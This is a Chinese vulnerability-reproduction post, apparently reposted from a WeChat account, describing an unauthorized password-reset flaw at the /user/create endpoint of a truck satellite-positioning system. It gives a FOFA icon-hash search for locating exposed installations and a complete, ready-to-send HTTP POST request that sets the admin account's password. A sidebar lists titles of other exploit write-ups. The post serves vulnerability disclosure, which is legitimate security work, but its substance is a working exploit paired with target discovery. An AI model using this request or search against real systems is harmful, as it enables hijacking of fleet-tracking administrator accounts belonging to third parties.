卡车卫星定位系统/user/create存在未授权密码重置漏洞

admin

102803
文章

87
评论

2024年4月24日22:12:46评论35 views字数 711阅读2分22秒阅读模式

漏洞描述

卡车卫星定位系统/user/create存在未授权密码重置漏洞，攻击者可利用此漏洞获取web后台管理权限。

资产测绘

FOFA：icon_hash="1553867732"

漏洞复现

POST /user/create HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

account=admin&id=1&password=test&passwordRepeat=test&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token=

原文始发于微信公众号（漏洞文库）：【漏洞复现】卡车卫星定位系统/user/create存在未授权密码重置漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

卡车卫星定位系统/user/create存在未授权密码重置漏洞

漏洞描述

漏洞复现

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信